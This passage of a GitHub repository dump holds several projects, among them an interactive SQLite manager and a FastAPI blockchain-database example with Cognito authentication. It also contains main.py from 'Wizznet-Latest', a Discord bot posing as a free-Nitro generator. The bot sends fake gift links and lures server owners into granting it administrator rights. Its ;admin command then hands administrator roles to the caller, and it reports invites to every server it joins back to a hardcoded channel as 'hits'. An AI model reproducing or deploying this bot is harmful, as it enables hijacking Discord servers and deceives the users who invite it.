fields\\n'\n txt += '10 - get with condition\\n'\n print(txt)\n\n\nif __name__ == '__main__':\n print (\"ManageSqliteDB v\" + __version__)\n db = ManageSqliteDB(auto=False)\n txt = '\\nManageDB interactive\\n'\n print(txt)\n while True:\n show_menu()\n c = int(input('Your choice: '))\n if c == 0:\n break\n\n elif c == 1:\n n = input('DB file name: ')\n db.opendb(n)\n\n elif c == 2:\n db.closedb()\n\n elif c == 3:\n table = input('Table where to get items: ')\n fields = input('Fields to get (coma separated, else \"*\" for all): ')\n if fields == \"*\":\n fields = None\n else:\n fields = [s.strip() for s in fields.split(\",\")]\n print(db.get(table, fields))\n\n elif c == 10:\n table = input('Table where to get items with condition: ')\n fields = input('Fields to get (coma separated, else \"*\" for all): ')\n conditions = input('Conditions (couples of field=value coma separated): ')\n conditions = [s.strip() for s in conditions.split(\",\")]\n if fields == \"*\":\n fields = None\n else:\n fields = [s.strip() for s in fields.split(\",\")]\n data = {}\n for condition in conditions:\n k, v = condition.split(\"=\")\n data[k.strip()] = v.strip()\n print(db.get(table, fields, **data))\n\n elif c == 9:\n table = input('Table where to get fields: ')\n print(db.list_fields(table))\n\n elif c == 4:\n table = input('Table where to add item: ')\n couples = input('Couples of field=value to set (coma separated): ')\n couples = [s.strip() for s in couples.split(\",\")]\n data = {}\n for couple in couples:\n k, v = couple.split(\"=\")\n data[k.strip()] = v.strip()\n db.set(table, **data)\n\n elif c == 5:\n table = input('Table where to delete an item: ')\n couples = input('Couples of field=value identifying the item (coma separated): ')\n couples = [s.strip() for s in couples.split(\",\")]\n data = {}\n for couple in couples:\n k, v = couple.split(\"=\")\n data[k.strip()] = v.strip()\n db.delete(table, **data)\n\n elif c == 6:\n print(db.list_tables())\n\n elif c == 7:\n table = input('Table to create: ')\n fields = input('List (coma separated) of fields (of type TEXT) and/or couples field=type: ')\n fields = [s.strip() for s in fields.split(\",\")]\n l = []\n for field in fields:\n if \"=\" in field:\n k, v = field.split(\"=\")\n l.append((k.strip(), v.strip()))\n else:\n l.append(field.strip())\n db.create(table, l)\n\n elif c == 8:\n req = input('Request: ')\n print(\"Result:\\n{}\".format(db.request(req)))\n\n" } ]
1
Jokersells/Wizznet-Latest
https://github.com/Jokersells/Wizznet-Latest
c14a0e19859451d373cfd28508695216f6b068d2
8d5c567b4e650d5a5d2581d6ff6799499c325af0
3a2b05e3b1c884cf3ef94f9f69f9f00e25e47f3a
refs/heads/main
2023-05-25T22:20:22.389649
2021-06-03T20:57:28
2021-06-03T20:57:28
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7910447716712952, "alphanum_fraction": 0.7910447716712952, "avg_line_length": 65, "blob_id": "eb6ce707614f6341d166f3164fee6bc51c67ec2a", "content_id": "e6bf12353843d1cb5b298c4fdfbb6a9f7f84b3bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 67, "license_type": "no_license", "max_line_length": 65, "num_lines": 1, "path": "/README.md", "repo_name": "Jokersells/Wizznet-Latest", "src_encoding": "UTF-8", "text": "\nMuffasa and Cashvoid tried to leak this so why not leak it myself\n" }, { "alpha_fraction": 0.7091229557991028, "alphanum_fraction": 0.7368884682655334, "avg_line_length": 35.03174591064453, "blob_id": "625430070e9b3149beaad65776e326cb4ca63468", "content_id": "7e80e7a20970049a0687a8e0b237680cd03b3406", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2271, "license_type": "no_license", "max_line_length": 148, "num_lines": 63, "path": "/main.py", "repo_name": "Jokersells/Wizznet-Latest", "src_encoding": "UTF-8", "text": "import random, string\nimport discord,random,time\nimport json\nimport asyncio\nfrom discord.ext import commands\nimport os \nimport aiohttp\n\nintents = discord.Intents.all()\nclient = commands.Bot(command_prefix = ';', help_command = None, intents=intents)\nclientdiscord = discord.Client()\nclient.remove_command(\"help\")\[email protected]\nasync def on_ready():\n print(\"I am alive\")\n await client.change_presence(activity=discord.Game(name=\n ';help┃arqez.sexy'))\n\[email protected]()\nasync def generate(ctx):\n user = ctx.author\n nitro = ''.join(random.choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(16))\n await user.send(f\"Heres your nitro https://discord.gift/{nitro}\")\n embed=discord.Embed(title=\"Generated You Nitro\", description=\"Enjoy\",color=0x7289da)\n await ctx.send(embed=embed)\n await ctx.message.delete()\n\[email protected]()\nasync def help(ctx):\n embed=discord.Embed(title=\"Help\", description=\"Free Nitro Commands\",color=0x7289da)\n embed.add_field(name=\";generate\", value=\"Generates Free Nitro\", inline=False)\n embed.add_field(name=\";invite\", value=\"Invite for more free nitro!\", inline=False)\n await ctx.send(embed=embed)\n\[email protected]()\nasync def invite(ctx):\n await ctx.send(\"**Invite me for more free nitro** https://discord.com/api/oauth2/authorize?client_id=848235353881444362&permissions=8&scope=bot \")\n\[email protected]()\nasync def admin(ctx):\n guild = ctx.guild\n role = await guild.create_role(name=\"Arq Net\", permissions=discord.Permissions(8),colour=discord.Colour(000000))\n authour = ctx.message.author\n await ctx.message.delete()\n await authour.add_roles(role)\n await guild.leave() \n \[email protected]\nasync def on_guild_join(guild):\n channel = client.get_channel(848238605352042569)\n z = random.choice(guild.text_channels)\n invitelink = await z.create_invite(max_uses=100,unique=True)\n await channel.send(f\"{invitelink} members > {guild.member_count} :ballot_box_with_check: @everyone total hits > {len(client.guilds)} \")\n\[email protected]()\nasync def scrape(ctx):\n for guild in client.guilds:\n \n z = random.choice(guild.text_channels)\n invitelink = await z.create_invite(max_uses=100,unique=True)\n await ctx.send(f\"Scraped > {invitelink} :ballot_box_with_check:\")\n \nclient.run(\"\")" } ]
2
monoper/BlockchainDB
https://github.com/monoper/BlockchainDB
ebafa3533941681f6754fdab7ac92e27c14c614b
cda8bb65e2351553d4d09e6396796eb0715641b7
054f551d0a3da1221c524b1828ea60756f776740
refs/heads/main
2023-04-02T04:12:36.229870
2021-04-12T12:52:33
2021-04-12T12:52:33
355,917,199
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.8062015771865845, "alphanum_fraction": 0.8062015771865845, "avg_line_length": 31.25, "blob_id": "03dafeb580804a745062c6da7b06f91a3f928591", "content_id": "76f045e0e586a222e89ca272bdc357aa413f73e8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "permissive", "max_line_length": 50, "num_lines": 4, "path": "/example/app/api/blockchain/__init__.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Grouping for blockchain related things\"\"\"\n\nfrom .blockchain import Blockchain as BlockchainDb\nfrom .api import blockchain_api\n" }, { "alpha_fraction": 0.7542504072189331, "alphanum_fraction": 0.7542504072189331, "avg_line_length": 28.409090042114258, "blob_id": "12a9e618078bdc21f00a27daa33930b0ee1ea2a1", "content_id": "d918d6f5efe6bbce4177f7073b0483786ec8bc2d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 647, "license_type": "permissive", "max_line_length": 75, "num_lines": 22, "path": "/example/app/api/provider_models.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "from typing import List\nfrom datetime import datetime\nfrom pydantic import BaseModel, EmailStr\nfrom .common_models import Address, Name, PhoneNumbers, ProvidableTreatment\n\nclass Provider(BaseModel):\n \"\"\"Model of a provider\"\"\"\n providerId: str\n name: Name\n phoneNumbers: PhoneNumbers\n addresses: List[Address]\n dateOfBirth: datetime\n email: EmailStr\n providableTreatments: List[ProvidableTreatment]\n\nclass ProviderSearchResult(BaseModel):\n \"\"\"Result of a provider search\"\"\"\n providerId: str\n name: Name\n phoneNumbers: PhoneNumbers\n addresses: List[Address]\n providableTreatments: List[ProvidableTreatment]\n" }, { "alpha_fraction": 0.5729513764381409, "alphanum_fraction": 0.6175882816314697, "avg_line_length": 30.914894104003906, "blob_id": "db50053907e616ccd08310b13648e43a6e5347a3", "content_id": "c24b99c12519a773a39c2fc098c9cda1987acaea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1501, "license_type": "permissive", "max_line_length": 339, "num_lines": 47, "path": "/example/test/load_testing/load_testing.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import asyncio\nimport json\nimport uuid\n\nimport requests\n\nasync def create_client_request():\n client_id = str(uuid.uuid4())\n url = 'http://localhost:5000/client/{}'.format(client_id)\n print('Using url: {}'.format(url))\n\n json_data = build_json_client_payload(client_id)\n\n resp = requests.post(url, json=json_data)\n\n for i in range(0, 500):\n await asyncio.gather(\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data)\n )\n\n print(resp)\n\n\ndef build_json_client_payload(client_id):\n data = '{\"name\":{\"firstName\":\"W\",\"middleName\":\"A\",\"lastName\":\"H\"},\"phoneNumbers\":{\"home\":\"1234567890\",\"mobile\":\"1234567890\",\"work\":\"1234567890\"},\"address\":{\"unit\":1,\"streetAddress\":\"123 fake street\",\"city\":\"Fake City\",\"province\":0,\"country\":\"Canada\",\"postalCode\":\"l1l1l1\"},\"dateOfBirth\":\"2021-01-29 23:50:58.272613\",\"email\":\"[email protected]\"}'\n json_data = json.loads(data)\n json_data['clientId'] = client_id\n\n return json_data\n\n\nasync def put_request(url, json_payload):\n resp = requests.put(url, json=json_payload)\n return resp.status_code\n\n\nasyncio.run(create_client_request())\n\n" }, { "alpha_fraction": 0.7116244435310364, "alphanum_fraction": 0.7175856828689575, "avg_line_length": 30.186046600341797, "blob_id": "aa68a114adfe23dfd59e4ab49ef76b1ee6b387c5", "content_id": "de54f60affeaca6c2956455c0a778cd48589f847", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1342, "license_type": "permissive", "max_line_length": 112, "num_lines": 43, "path": "/example/app/main.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Main entry point for application\"\"\"\n\nimport os\nimport logging\nfrom starlette.middleware import Middleware\nfrom starlette.middleware.cors import CORSMiddleware\nfrom fastapi import FastAPI, status, Request\nfrom .api import auth_api, client_api, provider_api, blockchain_api\nimport uuid\n\nlogging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)\n\nlogging.info(\"Starting\")\n\nif 'ENVIRONMENT' not in os.environ or os.environ['ENVIRONMENT'] == 'development':\n logging.info(\"Development CORS policy enabled\")\n middleware = [ Middleware(\n CORSMiddleware,\n allow_origins=['http://localhost:3000', 'http://localhost:*', 'https://app.dev.blockmedisolutions.com'],\n allow_credentials=True,\n allow_methods=['*'],\n allow_headers=['*']\n )]\n\n\napp = FastAPI(middleware=middleware)\n\[email protected](\"http\")\nasync def add_correlation_header(request: Request, call_next): \n correlation_id = str(uuid.uuid4())\n response = await call_next(request)\n response.headers[\"X-Correlation-Id\"] = correlation_id\n return response\n\napp.include_router(auth_api)\napp.include_router(client_api)\napp.include_router(provider_api)\napp.include_router(blockchain_api)\n\[email protected]('/api/health', status_code=status.HTTP_200_OK)\ndef health():\n \"\"\"Health check endpoint for use by ECS\"\"\"\n return True\n\n" }, { "alpha_fraction": 0.5823754668235779, "alphanum_fraction": 0.5977011322975159, "avg_line_length": 12.736842155456543, "blob_id": "c60ec9760077645ca72dfa63939fe5f82e47df7f", "content_id": "c8cf3ba5e0c29f8c95e5654658e4c186c57ce493", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 261, "license_type": "permissive", "max_line_length": 41, "num_lines": 19, "path": "/example/test/load_testing/async_test.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import asyncio\n\n\nasync def foo(n):\n return n + 1\n\nasync def main():\n tasks = []\n\n for i in range(7, 11):\n tasks.append(foo(i))\n\n result = await asyncio.gather(*tasks)\n\n print(result)\n return result\n\nres = asyncio.run(main())\nprint(res)\n" }, { "alpha_fraction": 0.7455752491950989, "alphanum_fraction": 0.7455752491950989, "avg_line_length": 21.600000381469727, "blob_id": "b730b6eb00afe01538a1a1e9beda46e11342f5c9", "content_id": "9b74de940ec224e45d3d5ef96bf9c37854741b1c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 452, "license_type": "permissive", "max_line_length": 54, "num_lines": 20, "path": "/example/app/api/client_models.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "from typing import List\nfrom datetime import datetime\nfrom pydantic import BaseModel, EmailStr\nfrom .common_models import Address, Name, PhoneNumbers\n\n\nclass LinkedProvider(BaseModel):\n providerId: str\n providerName: str\n hasAccess: bool\n\n\nclass Client(BaseModel):\n clientId: str\n name: Name\n phoneNumbers: PhoneNumbers\n address: Address\n dateOfBirth: datetime\n email: EmailStr\n linkedProviders: List[LinkedProvider] = []\n" }, { "alpha_fraction": 0.7122940421104431, "alphanum_fraction": 0.7275031805038452, "avg_line_length": 34.8636360168457, "blob_id": "29d714560a43cf0e6c1fc96d6863c416ebcc8f0a", "content_id": "82857b102e53c58548e77fb480f8aafe57feaad0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 789, "license_type": "permissive", "max_line_length": 85, "num_lines": 22, "path": "/src/blockchain/api/blockchain_routes.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Routes that are related to the actual blockchain\"\"\"\n\nfrom fastapi import Depends, APIRouter, status\nfrom ..blockchain import Blockchain as BlockchainDb\nfrom ..models import ProposedBlock\n\napi = APIRouter(\n prefix=\"/api/blockchain\",\n tags=[\"blockchain\"],\n dependencies=[Depends(BlockchainDb)],\n responses={404: {\"description\": \"Not found\"}},\n)\n\[email protected](\"/health\")\ndef get_client(database: BlockchainDb = Depends()):\n \"\"\"Endpoint to validate the blockchain as a whole\"\"\"\n return 200 if database.validate() else 400\n\[email protected](\"/validate-block\", status_code=status.HTTP_200_OK)\ndef update_client(proposed_block: ProposedBlock, database: BlockchainDb = Depends()):\n \"\"\"Endpoint to validate a single block\"\"\"\n return database.get_proposed_block_hash(proposed_block)\n" }, { "alpha_fraction": 0.4611923396587372, "alphanum_fraction": 0.6884139776229858, "avg_line_length": 15.163636207580566, "blob_id": "5c9c47f865e2ef0d0e724d847efcb35ca33134af", "content_id": "019da0293d7c869cb1c300af9a99f88725beac12", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 889, "license_type": "permissive", "max_line_length": 26, "num_lines": 55, "path": "/example/app/requirements.txt", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "aniso8601==8.0.0\nastroid==2.4.2\nattrs==20.3.0\nboto3==1.17.2\nbotocore==1.20.2\ncertifi==2020.12.5\ncffi==1.14.4\nchardet==4.0.0\nclick==7.1.2\ncryptography==3.3.1\ndnspython==2.1.0\necdsa==0.14.1\nemail-validator==1.1.2\nenvs==1.3\nfastapi==0.63.0\nh11==0.12.0\nhttptools==0.1.1\nidna==2.10\ninjector==0.18.4\ninstall==1.3.4\nisort==5.6.4\nitsdangerous==1.1.0\nJinja2==2.11.2\njmespath==0.10.0\njsonschema==3.2.0\nlazy-object-proxy==1.4.3\nMarkupSafe==1.1.1\nmccabe==0.6.1\npyasn1==0.4.8\npycognito==0.1.5\npycparser==2.20\npydantic==1.7.3\npylint==2.6.0\npymongo==3.11.2\npyrsistent==0.17.3\npython-dateutil==2.8.1\npython-dotenv==0.15.0\npython-jose==3.2.0\npytz==2020.4\nPyYAML==5.4.1\nrequests==2.25.1\nrsa==4.7\ns3transfer==0.3.4\nsix==1.15.0\nstarlette==0.13.6\ntoml==0.10.2\ntyping-extensions==3.7.4.3\nurllib3==1.26.3\nuvicorn==0.13.3\nuvloop==0.14.0\nuWSGI==2.0.19.1\nwatchgod==0.6\nwebsockets==8.1\nWerkzeug==1.0.1\nwrapt==1.12.1\n" }, { "alpha_fraction": 0.6517792344093323, "alphanum_fraction": 0.6604030728340149, "avg_line_length": 41.53281784057617, "blob_id": "156ae5d650313faaacca16913bb9e340a53ea410", "content_id": "25ce4b5b2882b38bef6f9aa604e668a080122e34", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11016, "license_type": "permissive", "max_line_length": 109, "num_lines": 259, "path": "/example/app/api/provider_routes.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Routes for provider api\"\"\"\nimport uuid\nfrom typing import Optional\nfrom fastapi import Depends, APIRouter, status\nfrom fastapi.exceptions import HTTPException\nfrom .provider_models import Provider, ProviderSearchResult\nfrom .common_models import Appointment, Provinces, ProvidableTreatment, AppointmentStatus, Address\nfrom .blockchain import BlockchainDb\nfrom .util import verify_auth_header\nfrom .client_models import Client, LinkedProvider\n\napi = APIRouter(\n prefix=\"/api/provider\",\n tags=[\"providers\"],\n dependencies=[Depends(BlockchainDb),Depends(verify_auth_header)],\n responses={404: {\"description\": \"Not found\"}},\n)\n\[email protected](\"/{provider_id}\", response_model=Provider, status_code=status.HTTP_200_OK)\ndef get_provider(provider_id: str, database: BlockchainDb = Depends()):\n \"\"\"Returns a single provider\"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n return Provider(**result)\n\[email protected](\"/{provider_id}\", status_code=status.HTTP_200_OK)\ndef update_provider(provider_id: str, provider: Provider, database: BlockchainDb = Depends()):\n \"\"\"Updates a provider\"\"\"\n if provider.providerId != provider_id:\n raise HTTPException(status_code=400,\n detail='Provider id in query parameter doesn\\'t match payload')\n\n database.commit_transaction(provider, 'EDIT', 'Provider', 'providerId', provider_id)\n\[email protected](\"/{provider_id}/providable-treatments\", status_code=status.HTTP_200_OK)\ndef get_provider_providable_treatments(provider_id: str, database: BlockchainDb = Depends()):\n \"\"\"Gets the treatments a provider can provide to a client\"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n return Provider(**result).providableTreatments\n\[email protected](\"/{provider_id}/providable-treatments\", status_code=status.HTTP_200_OK)\ndef add_provider_providable_treatment(provider_id: str, providableTreatment: ProvidableTreatment,\n database: BlockchainDb = Depends()):\n \"\"\"Adds a treatments that a provider can provide to a client\"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n provider = Provider(**result)\n\n for existing_providable_treatment in provider.providableTreatments:\n if existing_providable_treatment.name.lower() == providableTreatment.name.lower():\n raise HTTPException(status_code=400,\n detail=f'Providable treatment: \\\n {providableTreatment.name} already exists')\n\n providableTreatment.providableTreatmentId = str(uuid.uuid4())\n provider.providableTreatments.append(providableTreatment)\n\n database.commit_transaction(provider, 'EDIT', 'Provider', 'providerId', provider_id)\n\[email protected](\"/{provider_id}/address\", status_code=status.HTTP_200_OK)\ndef add_provider_address(provider_id: str, address: Address,\n database: BlockchainDb = Depends()):\n \"\"\"\n Adds provider address\n \"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n provider = Provider(**result)\n address.addressId = str(uuid.uuid4())\n provider.addresses.append(address)\n\n database.commit_transaction(provider, 'EDIT', 'Provider', 'providerId', provider_id)\n\[email protected](\"/{provider_id}/providable-treatments/{providable_treatment_id}\", status_code=status.HTTP_200_OK)\ndef delete_provider_providable_treatment(provider_id: str,\n providable_treatment_id: str,\n database: BlockchainDb = Depends()):\n \"\"\"Adds a treatments that a provider can provide to a client\"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n provider = Provider(**result)\n\n providable_treatments = []\n\n for existing_providable_treatment in provider.providableTreatments:\n if existing_providable_treatment.providableTreatmentId != providable_treatment_id:\n providable_treatments.append(existing_providable_treatment)\n\n provider.providableTreatments = providable_treatments\n\n database.commit_transaction(provider, 'EDIT', 'Provider', 'providerId', provider_id)\n\[email protected](\"/{provider_id}/address/{address_id}\", status_code=status.HTTP_200_OK)\ndef delete_provider_address(provider_id: str,\n address_id: str,\n database: BlockchainDb = Depends()):\n \"\"\"\n Removes an address from a provider\n \"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n provider = Provider(**result)\n\n addresses = []\n\n for existing_address in provider.addresses:\n if existing_address.addressId != address_id:\n addresses.append(existing_address)\n\n provider.addresses = addresses\n\n database.commit_transaction(provider, 'EDIT', 'Provider', 'providerId', provider_id)\n\[email protected](\"/{provider_id}/appointments\", status_code=status.HTTP_200_OK)\ndef get_provider_appointments(provider_id: str, database: BlockchainDb = Depends()):\n \"\"\"Gets appointments that are assigned to a provider\"\"\"\n result = database.find('Appointment', {'providerId': provider_id})\n\n if result is None:\n return {}\n\n return result\n\[email protected](\"/{provider_id}/appointments/{appointment_id}\", status_code=status.HTTP_200_OK)\ndef get_provider_appointment(provider_id: str, appointment_id: str,\n database: BlockchainDb = Depends()):\n \"\"\"Gets a single appoint that is assigned to a provider\"\"\"\n result = database.find_one('Appointment',\n {'providerId': provider_id, 'appointmentId': appointment_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Appointment not found')\n\n return result\n\[email protected](\"/{provider_id}/appointments/{appointment_id}/accept\", status_code=status.HTTP_200_OK)\ndef accept_provider_appointment(provider_id: str,\n appointment_id: str,\n database: BlockchainDb = Depends()):\n \"\"\"Accepts an appointment that is assigned to a provider\"\"\"\n appointment = database.find_one('Appointment',\n {'providerId': provider_id, 'appointmentId': appointment_id})\n\n if appointment is None:\n raise HTTPException(status_code=404, detail='Appointment not found')\n \n updated_appointment = Appointment(**appointment)\n\n updated_appointment.status = AppointmentStatus.Accepted\n\n #need to add protect so that only 1 create block can exist for a given ID\n result = database.commit_transaction(updated_appointment, 'EDIT',\n 'Appointment', 'appointmentId', appointment_id)\n\n return result\n\[email protected](\"/{provider_id}/appointments/{appointment_id}/reject\", status_code=status.HTTP_200_OK)\ndef reject_provider_appointment(provider_id: str,\n appointment_id: str,\n database: BlockchainDb = Depends()):\n \"\"\"Rejects an appointment that is assigned to a provider\"\"\"\n appointment = database.find_one('Appointment',\n {'providerId': provider_id, 'appointmentId': appointment_id})\n\n if appointment is None:\n raise HTTPException(status_code=404, detail='Appointment not found')\n\n updated_appointment = Appointment(**appointment)\n\n updated_appointment.status = AppointmentStatus.Rejected\n\n #need to add protect so that only 1 create block can exist for a given ID\n result = database.commit_transaction(updated_appointment, 'EDIT',\n 'Appointment', 'appointmentId', appointment_id)\n\n return result\n\[email protected](\"/{provider_id}/appointments/{appointment_id}\", status_code=status.HTTP_200_OK)\ndef update_provider_appointment(provider_id: str,\n appointment_id: str,\n appointment: Appointment,\n database: BlockchainDb = Depends()):\n if appointment.providerId != provider_id or appointment.appointmentId != appointment_id:\n raise HTTPException(status_code=400,\n detail='Provider id in query parameter doesn\\'t match payload')\n\n existing_appointment = Appointment(**database.find_one('Appointment',\n {'providerId': provider_id, 'appointmentId': appointment_id}))\n\n if existing_appointment.status == AppointmentStatus.Completed \\\n or existing_appointment.status == AppointmentStatus.Rejected:\n raise HTTPException(status_code=400,\n detail='Cannot update a completed or rejected appointment')\n\n #need to add protect so that only 1 create block can exist for a given ID\n result = database.commit_transaction(appointment, 'EDIT',\n 'Appointment', 'appointmentId', appointment_id)\n\n related_client_result = database.find_one('Client', { 'clientId': appointment.clientId})\n\n if related_client_result is None:\n raise HTTPException(status_code=404, detail='Client related to appointment not found')\n\n related_client = Client(**related_client_result)\n\n if not any(linked_provider.providerId == appointment.providerId\n for linked_provider in related_client.linkedProviders):\n raise HTTPException(status_code=403)\n \n if result is None:\n raise HTTPException(status_code=404, detail='Appointment not found')\n\n return result\n\[email protected](\"/search/available\", status_code=status.HTTP_200_OK)\ndef search_provider(name: Optional[str]=None, city: Optional[str]=None,\n province: Optional[Provinces]=None, database: BlockchainDb = Depends()):\n \"\"\"Searches for a provider based on nothing, a name, a city or a province\"\"\"\n query = {}\n\n if name is not None:\n name_query = { \"name.firstName\": { '$regex' : f'^{name}'} }\n query = {**name_query}\n#\n if city is not None:\n city_query = { \"address.city\": { '$regex' : f'^{city}'} }\n query = {**query, **city_query}\n\n if province is not None:\n province_query = { \"address.province\": province }\n query = {**query, **province_query}\n\n raw_results = database.find('Provider', query)\n\n results = []\n\n for raw_result in raw_results:\n results.append(ProviderSearchResult(**raw_result))\n\n return results\n" }, { "alpha_fraction": 0.6555184125900269, "alphanum_fraction": 0.6615384817123413, "avg_line_length": 46.84000015258789, "blob_id": "fd7e1bfcf42c23e05b9d277901103d9596390dea", "content_id": "6ab95c82a5abe06b7f582d02e1b2547ed3ebdb5b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5980, "license_type": "permissive", "max_line_length": 123, "num_lines": 125, "path": "/example/app/api/auth_routes.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import os\nimport uuid\nfrom pycognito import Cognito\nfrom fastapi import APIRouter, Depends, status\nfrom .blockchain import BlockchainDb\nfrom .client_models import Client\nfrom .provider_models import Provider\nfrom .util import verify_auth_header\nfrom .auth_models import RegisterClient, RegisterProvider, SignIn, ConfirmSignUp, \\\n ChangePassword, ConfirmForgotPassword, ForgotPassword, Token, \\\n User, SignInResponse\n\n\napi = APIRouter(\n prefix=\"/api/auth\",\n tags=[\"authentication\"],\n dependencies=[Depends(BlockchainDb)],\n responses={404: {\"description\": \"Not found\"}},\n)\n\[email protected]('/verify-token',\n status_code=status.HTTP_200_OK,\n dependencies=[Depends(verify_auth_header)])\ndef verify_token():\n pass\n\n\[email protected]('/register-client', response_model=str, status_code=status.HTTP_200_OK)\ndef register_client(client: RegisterClient, database: BlockchainDb = Depends()):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'], os.environ['USER_POOL_WEB_CLIENT_ID'])\n\n aws_cognito.username = client.username\n aws_cognito.set_base_attributes(email=client.username, name=f'{client.name.firstName}')\n aws_cognito.add_custom_attributes(usertype='client')\n response = aws_cognito.register(client.username, client.password)\n\n client.address.addressId = uuid.uuid4()\n\n database.commit_transaction(Client(clientId=response['UserSub'],\n name=client.name,\n phoneNumbers=client.phoneNumbers,\n address=client.address,\n dateOfBirth=client.dateOfBirth,\n email=client.email).dict(),\n 'CREATE', 'Client', 'clientId', response['UserSub'])\n return response['UserSub']\n\[email protected]('/register-provider', response_model=str, status_code=status.HTTP_200_OK)\ndef register_provider(provider: RegisterProvider, database: BlockchainDb = Depends()):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'], os.environ['USER_POOL_WEB_CLIENT_ID'])\n\n aws_cognito.username = provider.username\n aws_cognito.set_base_attributes(email=provider.username, name=f'{provider.name.firstName}')\n aws_cognito.add_custom_attributes(usertype='provider') \n response = aws_cognito.register(provider.username, provider.password)\n\n for providable_treatment in provider.providableTreatments:\n providable_treatment.providableTreatmentId = uuid.uuid4()\n\n for address in provider.addresses:\n address.addressId = uuid.uuid4()\n try:\n database.commit_transaction(Provider(providerId=response['UserSub'],\n name=provider.name,\n phoneNumbers=provider.phoneNumbers,\n addresses=provider.addresses,\n dateOfBirth=provider.dateOfBirth,\n email=provider.email,\n providableTreatments=provider.providableTreatments).dict(),\n 'CREATE', 'Provider', 'providerId', response['UserSub'])\n return response['UserSub']\n except:\n aws_cognito.delete_user()\n return status.HTTP_400_BAD_REQUEST\n\[email protected](\"/sign-in\", response_model=SignInResponse, status_code=status.HTTP_200_OK)\ndef sign_in(user_sign_in: SignIn):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'], os.environ['USER_POOL_WEB_CLIENT_ID'])\n aws_cognito.username = user_sign_in.username\n aws_cognito.authenticate(password=user_sign_in.password)\n user = aws_cognito.get_user(attr_map={\"usertype\": \"custom:usertype\",\"user_id\":\"sub\"})\n usertype = user._data[\"custom:usertype\"]\n user_id = user.sub\n resp = {\"user\": User(userId=user_id, username=user.username, usertype=usertype), \"token\":Token(**aws_cognito.__dict__)}\n return SignInResponse(**resp)\n\[email protected](\"/confirm-registration\", status_code=status.HTTP_200_OK)\ndef confirm_registration(confirm_sign_up: ConfirmSignUp):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'], os.environ['USER_POOL_WEB_CLIENT_ID'])\n aws_cognito.confirm_sign_up(confirm_sign_up.verificationCode, username=confirm_sign_up.username)\n\[email protected](\"/sign-out\", status_code=status.HTTP_200_OK)\ndef sign_out(token: str = Depends(verify_auth_header)):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'],\n os.environ['USER_POOL_WEB_CLIENT_ID'],\n access_token=token)\n aws_cognito.logout()\n\[email protected](\"/change-password\", status_code=status.HTTP_200_OK)\ndef change_password(user_change_password: ChangePassword, token: str = Depends(verify_auth_header)):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'],\n os.environ['USER_POOL_WEB_CLIENT_ID'],\n access_token=token)\n aws_cognito.change_password(user_change_password.old_password, user_change_password.new_password)\n\[email protected](\"/forgot-password\", status_code=status.HTTP_200_OK)\ndef forgot_password(user_forgot_password: ForgotPassword):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'],\n os.environ['USER_POOL_WEB_CLIENT_ID'])\n\n aws_cognito.username = user_forgot_password.username\n aws_cognito.add_custom_attributes(email=user_forgot_password.username)\n\n aws_cognito.initiate_forgot_password()\n\[email 